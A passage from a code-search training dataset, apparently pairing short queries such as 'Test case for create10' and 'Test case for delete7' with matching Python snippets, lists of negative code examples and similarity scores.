"def protein_from_orfs(dna):\n rna = dna.replace(\"T\", \"U\")\n reverse_complement_rna = complement_strand(dna).replace(\"T\", \"U\")\n\n candidate_proteins = set()\n\n for strand in [rna, reverse_complement_rna]:\n for index in [m.start() for m in re.finditer('AUG', strand)]:\n codons_list = codons(strand[index:])\n protein = \"\"\n\n if any(rna_codon_dict[codon] == \"Stop\" for codon in codons_list):\n for codon in codons_list:\n symbol = rna_codon_dict[codon]\n\n if symbol != \"Stop\":\n protein += symbol\n else:\n candidate_proteins.add(protein)\n break\n\n return candidate_proteins",
"def molpbcs(strucC, cov_nblist, cov_nbindx ,verbose = False, debug = False ):\n \n debug2 = False\n latticevec = strucC.getLatVec()\n\n n_dim = 3\n\n if( debug ):\n print \"latticevec\",latticevec\n F = open(\"shift.rec\",\"w\")\n \n for mol_i in range( 1,strucC.ptclC.n_molecules()+1) :\n\n if( verbose ):\n print \" Checking molecule %d of %d \"%(mol_i,strucC.ptclC.n_molecules())\n\n searchD = {'chain':mol_i}\n mol_list = strucC.ptclC.getParticlesWithTags(searchD)\n\n if( len( mol_list) > 0 ):\n ptclObj = strucC.ptclC[1]\n r_o = ptclObj.position\n pid_o = 1\n\n part_shifted = [False]*len(strucC.ptclC)\n\n r_mol_mass = np.zeros(n_dim)\n shift = np.zeros(n_dim)\n total_mass = 0.0 \n\n # shift all atoms to be conected \n \n for pid_i in sorted(mol_list):\n ptclObj_i = strucC.ptclC[pid_i]\n a_mass_i = ptclObj_i.mass\n r_i = ptclObj_i.position\n\n r_io = np.array(r_o) - np.array(r_i)\n\n # sum center of mass\n total_mass += a_mass_i\n\n\n \n shifted = False \n for dim in range(n_dim):\n shift_dim = round( r_io[dim]/ latticevec[dim][dim] )\n r_i[dim] = r_i[dim] + latticevec[dim][dim] * shift_dim\n if( shift_dim != 0 ):\n shifted = True \n \n r_mol_mass[dim] = r_mol_mass[dim] + a_mass_i*r_i[dim] \n \n\n if( debug and shifted ):\n shift_line = \"\\n %d - %d r = %f %f %f dr = %f %f %f \"%(pid_i,pid_o,ptclObj_i.position[0],ptclObj_i.position[1],ptclObj_i.position[2],r_io[0],r_io[1],r_io[2])\n F.write(shift_line)\n \n ptclObj_i.position = r_i\n r_o = r_i\n pid_o = pid_i\n\n # Shift molecular center of mass into box \n for dim in range(n_dim):\n cent_mass_i = r_mol_mass[dim] /total_mass\n shift[dim] = latticevec[dim][dim] * round( cent_mass_i / latticevec[dim][dim] )\n\n \n for pid_i in sorted(mol_list):\n ptclObj_i = strucC.ptclC[pid_i]\n for dim in range(n_dim):\n ptclObj_i.position[dim] = ptclObj_i.position[dim] - shift[dim] \n \n \n\n if( debug ):\n F.close()",
"def sequence_edits_as_features(self, feature_type=\"misc_feature\"):\n segments = sequences_differences_segments(\n self.sequence, self.sequence_before\n )\n return [\n Location(start, end).to_biopython_feature(\n label=\"%s=>%s\"\n % (self.sequence_before[start:end], self.sequence[start:end]),\n is_edit=\"true\",\n ApEinfo_fwdcolor=\"#ff0000\",\n color=\"#ff0000\",\n )\n for start, end in segments\n ]"
] |
[
"0.54200894",
"0.53885895",
"0.5254579",
"0.51519775",
"0.5098741",
"0.5096374",
"0.5024336",
"0.5018911",
"0.49383074",
"0.49299872",
"0.49182498",
"0.48595127",
"0.48558405",
"0.48059258",
"0.48001656",
"0.47948107",
"0.47804606",
"0.47686902",
"0.47572595",
"0.4755383",
"0.47546798",
"0.47306255",
"0.47266603",
"0.47222513",
"0.47107854",
"0.46885902",
"0.46814373",
"0.4671642",
"0.4639479",
"0.46368006"
] |
0.6112871
|
0
|
Test case for create10
|
def test_create10(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_create(self):\n pass",
"def test_create_run(self):\n pass",
"def test_create_unexpected_problem(self):\n pass",
"def create():",
"def create():",
"def create():\n pass",
"def test_0_0_create(self):\n\n self.assertTrue(self.b1)",
"def test_create_record(self):\n pass",
"def test_create_occurrence(self):\n pass",
"def create(self):",
"def create(*args):",
"def test_create(self):\n self.assertEqual(Routine.objects.count(), 2)\n payload = {\n 'name': 'Monday routine',\n }\n self.client.post('/routines/', data=payload)\n self.assertEqual(Routine.objects.count(), 3)",
"def create(self):\n ...",
"def test_create_valid_int(self):\n storage = FileStorage()\n tests = [9, 12, 10000]\n expected = [9, 12, 10000]\n\n for i in range(len(tests)):\n self.remove_all()\n with patch('sys.stdout', new=StringIO()) as f:\n self.console.onecmd(\n 'create BaseModel test_var={}'.format(tests[i]))\n attributes = list(storage.all().values())\n actual = attributes[0].test_var\n self.assertEqual(expected[i], actual)\n self.assertEqual(int, type(actual))",
"def test_create_invalid_int(self):\n storage = FileStorage()\n tests = ['9.a', '90ab10', '90.b1']\n\n for test in tests:\n self.remove_all()\n with patch('sys.stdout', new=StringIO()) as f:\n self.console.onecmd(\n 'create BaseModel test_var={}'.format(test))\n attributes = list(storage.all().values())\n self.assertFalse('test_var' in attributes[0].to_dict())",
"def test_new(self):",
"def test_new(self):",
"def test_create(self):\n\t\tself.obj.save()\n\t\tself.assertEqual(1, self.obj.id)",
"def test_create_template(self):\n m_size = 10\n data = ecn.IDData(m_size)\n self.assertEqual(np.shape(data.ID_MATRIX), (m_size, m_size))\n self.assertEqual(sum(sum(data.ID_MATRIX)), m_size)\n self.assertTrue((sum(data.ID_MATRIX) == np.ones(m_size)).all())\n print('Finished testing template\\n')",
"def test_createUser_single(self):\n #TODO: this and other tests",
"def test_create(self):\n B._Base__nb_objects = 0\n\n d = {'id': 5, 'width': 3, 'height': 7, 'x': 2, 'y': 1}\n r1 = Rectangle.create(**d)\n self.assertEqual(r1.to_dictionary(), d)\n self.assertEqual(B._Base__nb_objects, 1)\n\n s2 = Square(5)\n d4 = s2.to_dictionary()\n s5 = Square.create(**d4)\n self.assertEqual(s5.to_dictionary(), d4)\n self.assertEqual(B._Base__nb_objects, 3)",
"def test_create_scenario1(self):\n pass",
"def test_create_system_entire(self):\n pass",
"def test_create_activity_occurrence(self):\n pass",
"def generate_test_data(self, obj_name, number_to_create, **fields):\n objs = []\n\n for i in range(int(number_to_create)):\n formatted_fields = {\n name: format_str(value, {\"number\": i}) for name, value in fields.items()\n }\n newobj = self._salesforce_generate_object(obj_name, **formatted_fields)\n objs.append(newobj)\n\n return objs",
"def test_func(x):\n for i in range(32):\n handle = self.model_manager.create(name='%s-%s' % (x, i))\n self.assertTrue(\n handle in [m.handle for m in self.model_manager.models()])\n self.model_manager.delete(handle)\n self.assertTrue(\n handle not in\n [m.handle for m in self.model_manager.models()])\n return True",
"def create(self):\n pass",
"def create(self):\n pass",
"def create(self):\n pass",
"def test_create_template_subsciption(self):\n pass"
] |
[
"0.73249733",
"0.7319273",
"0.69483125",
"0.6945639",
"0.6945639",
"0.6840163",
"0.6767891",
"0.67604375",
"0.669465",
"0.66335654",
"0.65506196",
"0.64774275",
"0.6434738",
"0.6417117",
"0.6386177",
"0.6376453",
"0.6376453",
"0.627494",
"0.6224595",
"0.6221611",
"0.6197326",
"0.61541563",
"0.6153361",
"0.61518544",
"0.6145056",
"0.61326486",
"0.61218643",
"0.61218643",
"0.61218643",
"0.6121304"
] |
0.8980569
|
0
|
Test case for create_bulk_academic
|
def test_create_bulk_academic(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_get_Student_bulk(self):\n school_ids = self.create_School(2,20)\n url = '/students'\n for i in range(10):\n data = {'first_name': 'Poompatai', 'last_name': 'Puntitpong','age': 20, 'nationality': 'Thailand', 'school': school_ids[0]}\n response = self.client.post(url, data, format='json')\n\n response = self.client.get(url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['count'], 10)\n self.assertEqual(response.data['results'][0]['first_name'], 'Poompatai')\n self.assertEqual(response.data['results'][0]['last_name'], 'Puntitpong')\n self.assertEqual(response.data['results'][0]['age'], 20)\n self.assertEqual(response.data['results'][0]['nationality'], 'Thailand')\n self.assertEqual(response.data['results'][0]['school'], school_ids[0])",
"def test_otoroshi_controllers_adminapi_tcp_service_api_controller_bulk_create_action(self):\n pass",
"def test_bulk_create(self):\n urls = [reverse('api:user-list')]\n data = [\n {\n \"username\": \"newuser1\",\n \"email\": \"[email protected]\",\n \"password\": \"password\"\n },\n {\n \"username\": \"newuser2\",\n \"email\": \"[email protected]\",\n \"password\": \"password\"\n },\n ]\n access = {\n \"forbidden\": [self.admin_client, self.anonymous_client, self.readonly_client, self.custodian_1_client],\n \"allowed\": []\n }\n for client in access['forbidden']:\n for url in urls:\n self.assertIn(\n client.post(url, data, format='json').status_code,\n [status.HTTP_400_BAD_REQUEST, status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN]\n )\n\n for client in access['allowed']:\n for url in urls:\n self.assertEqual(\n client.post(url, data, format='json').status_code,\n status.HTTP_201_CREATED\n )",
"def test_create_Student_full(self):\n school_ids = self.create_School(1,20)\n url = '/students'\n data = {'first_name': 'Poompatai', 'last_name': 'Puntitpong','age': 20, 'nationality': 'Thailand', 'school': school_ids[0]}\n for i in range(20):\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.data['school'][0].code, 'invalid')\n self.assertEqual(str(response.data['school'][0]), 'School Triamudomsuksa already has maximum number of students')",
"def test_get_people_list(self):\n person_1 = Person(\n first_name='Emilia',\n last_name='Clarke',\n aliases='Emi'\n )\n person_2 = Person(\n first_name='Peter',\n last_name='Dinklage',\n )\n person_3 = Person(\n first_name='Thomas',\n last_name='McCarthy',\n aliases='Thom'\n )\n\n Person.objects.bulk_create([person_1, person_2, person_3])\n\n response = self.client.get(self.url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data.get('count'), Person.objects.count())",
"def test_batch_create_occurrences(self):\n pass",
"def bulk_create_samples(request):\n sample_names = request.data['names']\n library_uuid = request.data['library']\n library = SampleGroup.objects.get(pk=library_uuid)\n try:\n membership_queryset = request.user.organization_set.filter(pk=library.organization.pk)\n authorized = membership_queryset.exists()\n except AttributeError: # occurs if user is not logged in\n authorized = False\n if not authorized:\n raise PermissionDenied(_('Insufficient permissions to get group manifest.'))\n uuids = []\n for name in sample_names:\n sample = library.create_sample(name=name)\n uuids.append(sample.uuid)\n return Response({'uuids': uuids}, status=201)",
"def test_bulk_group(self):\n for fn, sep in [(self.filename_actg, '\\t'),\n (self.filename_actg_csv, ';')]:\n file_path_ag = os.path.join(os.path.dirname(__file__),\n self.testdata_folder,\n fn)\n data = {\n 'bulk_upload' : open(file_path_ag, 'rb'),\n }\n\n existing_ags = ActivityGroup.objects.filter(keyflow=self.kic)\n existing_codes = list(existing_ags.values_list('code', flat=True))\n\n encoding = 'utf8'\n df_file_ags = pd.read_csv(file_path_ag, sep=sep)\n df_file_ags = df_file_ags.rename(\n columns={c: c.lower() for c in df_file_ags.columns})\n file_codes = df_file_ags['code']\n new_codes = [c for c in file_codes if c not in existing_codes]\n\n res = self.client.post(self.ag_url, data)\n res_json = res.json()\n assert res.status_code == status.HTTP_201_CREATED\n assert res_json['count'] == len(file_codes)\n assert len(res_json['created']) == len(new_codes)\n\n # assert that the number of activities matches\n all_ag = ActivityGroup.objects.filter(keyflow_id=self.kic.id)\n assert len(all_ag) == len(existing_codes) + len(new_codes)\n\n # assert that the Name matches in all values\n for row in df_file_ags.itertuples(index=False):\n ag = ActivityGroup.objects.get(keyflow=self.keyflow,\n code=row.code)\n assert ag.name == row.name",
"def test_perform_create(self):\n\n response = self.client.post(reverse('action-list'), data=self.data)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(response.data['name'], self.data['name'])\n self.assertTrue(len(response.data['institution']), self.data['institution'])",
"def create_bulk_job(request: HttpRequest) -> Optional[JsonResponse]:\n dynamodb_table = dynamodb.Table(table_name)\n user_id = request.LTI[\"lis_person_sourcedid\"]\n user_full_name = request.LTI[\"lis_person_name_full\"]\n user_email = request.LTI[\"lis_person_contact_email_primary\"]\n sis_account_id = request.LTI[\"custom_canvas_account_sis_id\"]\n school_id = sis_account_id.split(\":\")[1]\n\n table_data = json.loads(request.POST['data'])\n\n term_id = request.POST['termID']\n term = Term.objects.get(term_id=term_id)\n term_name = term.display_name\n sis_term_id = term.meta_term_id()\n course_group_id = request.POST['courseGroupID']\n course_group_name = None\n department_id = request.POST['departmentID']\n department_name = None\n create_all = table_data['create_all']\n course_instance_ids = table_data['course_instance_ids']\n template_id = None if table_data['template'] == '0' else table_data['template']\n template_name = 'No template' if not template_id else get_canvas_site_template_name(template_id)\n\n if create_all:\n # Get all course instance records that will have Canvas sites created by filtering on the\n # term and (course group or department) values\n # Also filter on the 'bulk_processing' flag to avoid multiple job submission conflicts\n potential_course_sites_query = get_course_instance_query_set(\n term_id, sis_account_id\n ).filter(canvas_course_id__isnull=True,\n sync_to_canvas=0,\n bulk_processing=0).select_related('course')\n\n # Check if a course group or department filter needs to be applied to queryset\n # The value of 0 is for the default option of no selected Department/Course Group\n if school_id == 'colgsas':\n if course_group_id and course_group_id != '0':\n course_group_name = CourseGroup.objects.get(course_group_id=course_group_id).name\n potential_course_sites_query = potential_course_sites_query.filter(course__course_group=course_group_id)\n else:\n if department_id and department_id != '0':\n department_name = Department.objects.get(department_id=department_id).name\n potential_course_sites_query = potential_course_sites_query.filter(course__department=department_id)\n\n else:\n # Get all potential course instances for the selected term in the account\n # Further filter by the selected course instances from the DataTable\n potential_course_sites_query = get_course_instance_query_set(\n term_id, sis_account_id\n ).filter(canvas_course_id__isnull=True,\n sync_to_canvas=0,\n bulk_processing=0,\n course_instance_id__in=course_instance_ids).select_related('course')\n\n if potential_course_sites_query.count() > 0:\n job = JobRecord(\n user_id=user_id,\n user_full_name=user_full_name,\n user_email=user_email,\n school=school_id,\n term_id=term_id,\n sis_term_id=sis_term_id,\n term_name=term_name,\n department_id=department_id,\n department_name=department_name,\n course_group_id=course_group_id,\n course_group_name=course_group_name,\n template_id=template_id,\n template_name=template_name,\n workflow_state=\"pending\",\n )\n\n log_extra = {\n 'sis_account_id': sis_account_id,\n 'user_id': user_id,\n 'user_full_name': user_full_name,\n 'user_email': user_email,\n 'school': school_id,\n 'term_id': term_id,\n 'term_name': term_name,\n 'department_id': department_id,\n 'department_name': department_name,\n 'course_group_id': course_group_id,\n 'course_group_name': course_group_name,\n 'template_id': template_id\n }\n # Sanitized input for log statements.\n term_id = str(term_id)\n sis_account_id = str(sis_account_id)\n logger.debug(f'Generating task objects for 
term ID {term_id} (term name {term_name}) '\n f'and custom Canvas account sis ID {sis_account_id}.', extra=log_extra)\n\n # Create TaskRecord objects for each course instance\n tasks = generate_task_objects(potential_course_sites_query, job)\n\n # Set the bulk_processing field to true for all course instances being processed by this job so they\n # do not show up in the new job page\n potential_course_sites_query.update(bulk_processing=True)\n\n logger.debug(f'Creating bulk job for term ID {term_id} (term name {term_name}) '\n f'and custom Canvas account sis ID {sis_account_id}.', extra=log_extra)\n # Write the TaskRecords to DynamoDB. We insert these first since the subsequent JobRecord\n # kicks off the downstream bulk workflow via a DynamoDB stream.\n batch_write_item(dynamodb_table, tasks)\n\n # Now write the JobRecord to DynamoDB\n response = dynamodb_table.put_item(Item=job.to_dict())\n if response[\"ResponseMetadata\"][\"HTTPStatusCode\"] != 200:\n logger.error(f\"Error adding JobRecord to DynamoDB: {response}\")\n # TODO improve this logging statement\n\n messages.add_message(request, messages.SUCCESS, 'Bulk job created')\n else:\n messages.add_message(request, messages.WARNING, 'No potential course sites available with provided filters')\n\n logger.debug(f'Job creation process complete for term ID {term_id} (term name {term_name}) '\n f'and custom Canvas account sis ID {sis_account_id}.', extra=log_extra)\n return redirect('bulk_site_creator:index')",
"def test_create_occurrence(self):\n pass",
"def test_bulk_activity(self):\n file_path_ac = os.path.join(os.path.dirname(__file__),\n self.testdata_folder,\n self.filename_act)\n data = {\n 'bulk_upload' : open(file_path_ac, 'rb'),\n }\n\n existing_acs = Activity.objects.filter(activitygroup__keyflow=self.kic)\n existing_nace = list(existing_acs.values_list('nace', flat=True))\n\n encoding = 'cp1252'\n df_file_ags = pd.read_csv(file_path_ac, sep='\\t', encoding=encoding)\n df_file_ags = df_file_ags.rename(\n columns={c: c.lower() for c in df_file_ags.columns})\n file_nace = df_file_ags['nace']\n new_nace = [c for c in file_nace if str(c) not in existing_nace]\n\n res = self.client.post(self.ac_url, data)\n assert res.status_code == status.HTTP_201_CREATED\n res_json = res.json()\n assert res_json['count'] == len(file_nace)\n assert len(res_json['created']) == len(new_nace)\n\n # assert that the number of activities matches\n all_ac = Activity.objects.filter(activitygroup__keyflow=self.kic)\n assert len(all_ac) == len(existing_nace) + len(new_nace)\n\n # assert that the Name matches in all values\n for row in df_file_ags.itertuples(index=False):\n # ToDo: different test case if activitygroups don't exist\n ag = ActivityGroup.objects.get(code=row.ag)\n ac = Activity.objects.get(activitygroup=ag,\n nace=row.nace)\n assert ac.name == row.name",
"def test_create(self):\n pass",
"def test_instantiating_salesforce_bulk_job_validates_operation(salesforce_session, bulk_request):\n with pytest.raises(AssertionError):\n SalesforceBulkJob('floob', 'Lead')",
"def test_get_recipe_information_bulk(self):\n pass",
"def test_website_companies_create(self):\n pass",
"def test_create_instructor_complete_data(self):\n response = self.client.post(self.url, data=json.dumps(self.payload_all), content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_200_OK, msg=response.content.decode())\n self.assertEqual(Instructor.objects.count(), self.qty + 1)\n self.assertTrue(User.objects.filter(email=self.payload_all['email']).exists())\n self.assertTrue(User.objects.filter(username=self.payload_all['email']).exists())\n user_id = User.objects.get(username=self.payload_all['email']).id\n self.assertTrue(Instructor.objects.filter(user_id=user_id).exists())",
"def test_create_manual_account02(self, client):\n user = UserFactory.get_user()\n institution = InstitutionFactory.get_manual_institution()\n account = Account.objects.create_manual_account(\n user.id, institution.id, '1111111', '')\n assert isinstance(account, Account)\n assert account.type_ds == Account.DEBT\n\n account = Account.objects.create_manual_account(\n user.id, institution.id, '2222222', 'some')\n assert Item.objects.count() == 1",
"def bulk_create(cls, cb, approvals):\n url = cls.urlobject.format(cb.credentials.org_key) + \"/_bulk\"\n resp = cb.post_object(url, body=approvals)\n result = resp.json()\n item_list = result.get(\"results\", [])\n return [cls(cb, item[\"id\"], item) for item in item_list]",
"def test_create_Student(self):\n school_ids = self.create_School(1,20)\n url = '/students'\n data = {'first_name': 'Poompatai', 'last_name': 'Puntitpong','age': 20, 'nationality': 'Thailand', 'school': school_ids[0]}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Student.objects.count(), 1)\n self.assertEqual(Student.objects.get().first_name, 'Poompatai')\n self.assertEqual(Student.objects.get().last_name, 'Puntitpong')\n self.assertEqual(Student.objects.get().age, 20)\n self.assertEqual(Student.objects.get().nationality, 'Thailand')\n self.assertEqual(Student.objects.get().school.id, school_ids[0])\n\n \"\"\"Invalid School\"\"\"\n data = {'first_name': 'Poompatai', 'last_name': 'Puntitpong','age': 20, 'nationality': 'Thailand', 'school': 'aaaa'}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)",
"def test_create_Student_data_type(self):\n school_ids = self.create_School(1,20)\n url = '/students'\n \"\"\"String age\"\"\"\n data = {'first_name': 'Poompatai', 'last_name': 'Puntitpong','age': '20', 'nationality': 'Thailand', 'school': school_ids[0]}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Student.objects.count(), 1)\n self.assertEqual(Student.objects.get().first_name, 'Poompatai')\n self.assertEqual(Student.objects.get().last_name, 'Puntitpong')\n self.assertEqual(Student.objects.get().age, 20)\n self.assertEqual(Student.objects.get().nationality, 'Thailand')\n self.assertEqual(Student.objects.get().school.id, school_ids[0])\n\n \"\"\"Name, nationality, type number\"\"\"\n data = {'first_name':123, 'last_name': 123,'age': 20, 'nationality': 123, 'school': school_ids[0]}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n \"\"\"String age but non convertable\"\"\"\n data = {'first_name': 'Poompatai', 'last_name': 'Puntitpong','age': 'AAA', 'nationality': 'Thailand', 'school': school_ids[0]}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)",
"def test_create_campaign(self):\n acc1 = Account.objects.create(name='acc1', code='111-111')\n row = {'PROJ_NAME1': 'China Fund', 'PROJ_NO': 'CFD-111',\n 'LOCATION': 'CHINA', 'SUMMARY': 'Ssssss'}\n sync.create_campaign(acc1, row, 'China Fund', Account.COUNTRY)\n campaign = Campaign.objects.filter(name='China Fund').first()\n self.assertEqual(self.china.pk, campaign.country.pk)\n\n acc2 = Account.objects.create(name='acc2', code='222-222')\n row = {'PROJ_NAME1': 'Smith Memorial Fund', 'PROJ_NO': 'SPF-222',\n 'SUMMARY': 'Ssssss'}\n sync.create_campaign(acc2, row, 'Smith Memorial Fund',\n Account.MEMORIAL)\n campaign = Campaign.objects.filter(name='Smith Memorial Fund').first()\n self.assertEqual(None, campaign.country)\n self.assertEqual(\n {\"data\": [{\"type\": \"text\", \"data\": {\"text\": \"Ssssss\"}}]},\n json.loads(campaign.description))\n acc1.delete()\n acc2.delete()",
"def test_create_student_complete_data(self):\n response = self.client.post(self.url, data=json.dumps(self.payload_all), content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_200_OK, msg=response.content.decode())\n self.assertEqual(Student.objects.count(), self.qty + 1)\n self.assertTrue(User.objects.filter(email=self.payload_all['email']).exists())\n self.assertTrue(User.objects.filter(username=self.payload_all['email']).exists())\n user_id = User.objects.get(username=self.payload_all['email']).id\n self.assertTrue(Student.objects.filter(user_id=user_id).exists())",
"def test_instantiating_salesforce_bulk_job_validates_object(salesforce_session, bulk_request):\n with pytest.raises(AssertionError):\n SalesforceBulkJob('update', 'lead')\n with pytest.raises(AssertionError):\n SalesforceBulkJob('update', 'Floob')",
"def test_persons_import(self):\n with mock.patch.multiple(\n PersonClient,\n _post=self._mock_post\n ):\n audit = factories.AuditFactory()\n\n slug = \"AssessmentTemplate1\"\n response = self.import_data(OrderedDict([\n (\"object_type\", \"Assessment_Template\"),\n (\"Code*\", slug),\n (\"Audit*\", audit.slug),\n (\"Default Assignee\", \"[email protected]\"),\n (\"Default Verifier\", \"[email protected]\\[email protected]\"),\n (\"Title\", \"Title\"),\n (\"Object Under Assessment\", 'Control'),\n ]))\n self._check_csv_response(response, {})\n assessment_template = AssessmentTemplate.query.filter(\n AssessmentTemplate.slug == slug).first()\n\n self.assertEqual(len(assessment_template.default_people['verifiers']), 2)\n self.assertEqual(len(assessment_template.default_people['assessors']), 1)",
"def test_create(self):\n for citizen in self.citizen_datas:\n # Request the citizen creation.\n body = dict(zip(self.citizen_fields, citizen))\n\n resp = self.client.post(self.url, data=json.dumps(body), content_type='application/json')\n\n # Ensure estatus 201\n assert resp.status_code == HTTPStatus.CREATED, \\\n '{url}: Got {error}, Expected {code}'. \\\n format(url=self.url, error=resp.status_code, code=HTTPStatus.CREATED.value)\n\n resp_body = resp.json()\n # Ensure data created is correct.\n for key in body:\n assert resp_body[key] == body[key], \\\n '{url}: Got field {field} -> {error}, Expected {code}'. \\\n format(url=self.url, field = key, error=resp_body[key], code=body[key])",
"def test_bulk_flow(self):\n lengths = []\n before = Actor2Actor.objects.count()\n for i in range(2):\n file_path = os.path.join(os.path.dirname(__file__),\n self.testdata_folder,\n self.filename_a2a)\n data = {\n 'bulk_upload' : open(file_path, 'rb'),\n }\n\n res = self.client.post(self.a2a_url, data)\n assert res.status_code == status.HTTP_201_CREATED\n lengths.append(Actor2Actor.objects.count())\n # check that 2nd loop does not create additional products\n # but updates them\n assert lengths[0] == lengths[1]\n new = lengths[0] - before\n # check if new fraction-flow per material per new flow was created\n assert FractionFlow.objects.count() == \\\n new * self.composition.fractions.count()\n file_path = os.path.join(os.path.dirname(__file__),\n self.testdata_folder,\n self.filename_a2a_error)\n data = {\n 'bulk_upload' : open(file_path, 'rb'),\n }\n\n res = self.client.post(self.a2a_url, data)\n assert res.status_code == status.HTTP_400_BAD_REQUEST\n\n file_path = os.path.join(os.path.dirname(__file__),\n self.testdata_folder,\n self.filename_a2a_self_ref)\n data = {\n 'bulk_upload' : open(file_path, 'rb'),\n }\n\n res = self.client.post(self.a2a_url, data)\n assert res.status_code == status.HTTP_400_BAD_REQUEST",
"def test_post(self):\n user = self.make_user()\n school_year = SchoolYearFactory(school__admin=user)\n\n with self.login(user):\n response = self.post(\"reports:bundle\", school_year.pk)\n\n self.response_302(response)\n assert school_year.bundle_set.count() == 1",
"def setUpTestData(cls):\n number_of_authors = 13\n\n for author_id in range(number_of_authors):\n Author.objects.create(\n first_name=f'Christian {author_id}',\n last_name=f'Surname {author_id}',\n )",
"def test_create_record(self):\n pass"
] |
[
"0.68857133",
"0.67814386",
"0.66630286",
"0.6434951",
"0.6303845",
"0.6181681",
"0.6117092",
"0.6060836",
"0.60593385",
"0.6038709",
"0.60217255",
"0.6008689",
"0.5981003",
"0.5978704",
"0.59675664",
"0.59448993",
"0.59369195",
"0.59315854",
"0.5929955",
"0.59234595",
"0.58894205",
"0.58750355",
"0.58731437",
"0.5854188",
"0.5854128",
"0.5834831",
"0.58197767",
"0.5819044",
"0.58148086",
"0.57970804"
] |
0.95521
|
0
|
Test case for delete7
|
def test_delete7(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_delete1(self):\n pass",
"def test_delete_run(self):\n pass",
"def delete():",
"def test_delete(self):\n pass",
"def test_delete_case(self):\n pass",
"def test_delete_occurrence(self):\n pass",
"def test_delete_item_using_delete(self):\n pass",
"def test_delete_record(self):\n pass",
"def delete(self, *args, **kwargs):\n return 0",
"def test_delete_records(self):\n pass",
"def do_delete(self, arg):\n \treturn False",
"def delete(self):\n ...",
"def test_remove(self):\n pass",
"def test_delitem(self):\n with self.assertRaises(QiitaDBNotImplementedError):\n del self.tester['1.SKM7.640188']",
"def test_delete(self):\r\n course = CourseFactory.create(org='edX', course='999')\r\n with self.assertRaises(ValueError):\r\n tabs.primitive_delete(course, 0)\r\n with self.assertRaises(ValueError):\r\n tabs.primitive_delete(course, 1)\r\n with self.assertRaises(IndexError):\r\n tabs.primitive_delete(course, 6)\r\n tabs.primitive_delete(course, 2)\r\n self.assertFalse({u'type': u'textbooks'} in course.tabs)\r\n # Check that discussion has shifted up\r\n self.assertEquals(course.tabs[2], {'type': 'discussion', 'name': 'Discussion'})",
"def test_delete_complex_tree_08(comp):\n comp.delete(11)\n assert tuple(comp.in_order()) == (4, 6, 7, 8, 9, 10, 12, 13, 14, 15)\n assert tuple(comp.breadth_first()) == (12, 8, 14, 6, 10, 13, 15, 4, 7, 9)",
"def test_delete_complex_tree_07(comp):\n comp.delete(12)\n assert tuple(comp.in_order()) == (4, 6, 7, 8, 9, 10, 11, 13, 14, 15)\n assert tuple(comp.breadth_first()) == (11, 8, 14, 6, 10, 13, 15, 4, 7, 9)",
"def test_delete_complex_tree_06(comp):\n comp.delete(9)\n assert tuple(comp.in_order()) == (4, 6, 7, 8, 10, 11, 12, 13, 14, 15)\n assert tuple(comp.breadth_first()) == (11, 8, 13, 6, 10, 12, 14, 4, 7, 15)",
"def test_delete_complex_tree_05(comp):\n comp.delete(8)\n assert tuple(comp.in_order()) == (4, 6, 7, 9, 10, 11, 12, 13, 14, 15)\n assert tuple(comp.breadth_first()) == (11, 9, 13, 6, 10, 12, 14, 4, 7, 15)",
"def test_007_delete(self):\n HEADING()\n db = self.db\n\n db.connect()\n print (\"AAA\")\n before_count = len(db)\n print (\"CCC\", len(db))\n job = db.insert(\"deleteme\")\n print (\"DDD\", len(db))\n\n job = db.delete_jobs(\"job_name\", \"deleteme\")\n print (\"EEE\")\n after_count = len(db)\n print (\"FFF\", len(db))\n assert(before_count - after_count == 0)",
"def test_delete_goal(self):\n pass",
"def test_delete_complex_tree_04(comp):\n comp.delete(13)\n assert tuple(comp.in_order()) == (4, 6, 7, 8, 9, 10, 11, 12, 14, 15)\n assert tuple(comp.breadth_first()) == (11, 8, 14, 6, 10, 12, 15, 4, 7, 9)",
"def test_delete(self):\n # login as library manager\n self.authenticate(self.user)\n\n # check there are 3 works\n self.assertEqual(Work.objects.count(), 3)\n\n self.assertNotEqual(self.work1.song_set.count(), 0)\n\n # prune works\n response = self.client.delete(self.url)\n\n # check http status\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n # check the response\n self.assertDictEqual(response.data, {\"deleted_count\": 2})\n\n # check there are only 1 work remaining\n self.assertEqual(Work.objects.count(), 1)\n\n # check artists with songs remains\n self.assertEqual(Work.objects.filter(pk=self.work2.pk).count(), 0)\n self.assertEqual(Work.objects.filter(pk=self.work3.pk).count(), 0)",
"def test_do_delete(test_dao):\r\n DUT = dtmFunction(test_dao, test=True)\r\n DUT.do_select_all(revision_id=1)\r\n DUT.do_insert(revision_id=1, parent_id=1)\r\n\r\n _error_code, _msg = DUT.do_delete(DUT.last_id)\r\n\r\n assert _error_code == 0\r\n assert _msg == (\"RAMSTK SUCCESS: Deleting an item from the RAMSTK Program \"\r\n \"database.\")",
